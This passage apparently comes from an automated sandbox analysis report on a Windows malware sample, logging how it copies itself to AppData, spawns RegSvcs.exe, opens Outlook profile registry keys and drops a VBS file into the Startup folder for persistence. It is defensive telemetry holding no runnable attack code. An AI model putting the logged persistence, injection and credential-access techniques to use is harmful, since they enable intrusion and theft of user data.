                Source: C:\Users\user\Desktop\RubzLi27lr.exeProcess created: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe "C:\Users\user\Desktop\RubzLi27lr.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RubzLi27lr.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe" Jump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: RubzLi27lr.exeStatic file information: File size 1094656 > 1048576
                Source: RubzLi27lr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: RubzLi27lr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: RubzLi27lr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: RubzLi27lr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: RubzLi27lr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: RubzLi27lr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: RubzLi27lr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: spadixes.exe, 00000002.00000003.2176143438.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.2174741374.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336964196.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336545567.00000000041C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: spadixes.exe, 00000002.00000003.2176143438.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.2174741374.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336964196.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336545567.00000000041C0000.00000004.00001000.00020000.00000000.sdmp
                Source: RubzLi27lr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: RubzLi27lr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: RubzLi27lr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: RubzLi27lr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: RubzLi27lr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AB42DE
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AD0A76 push ecx; ret 0_2_00AD0A89
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00900A76 push ecx; ret 2_2_00900A89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9921E push es; ret 9_2_06A99244
                Source: C:\Users\user\Desktop\RubzLi27lr.exeFile created: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeJump to dropped file

                Boot Survival

                barindex
                Drops VBS files to the startup folder
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbsJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00ACF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00ACF98E
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B41C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B41C41
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_008FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_008FF98E
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00971C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00971C41
                Source: C:\Users\user\Desktop\RubzLi27lr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion
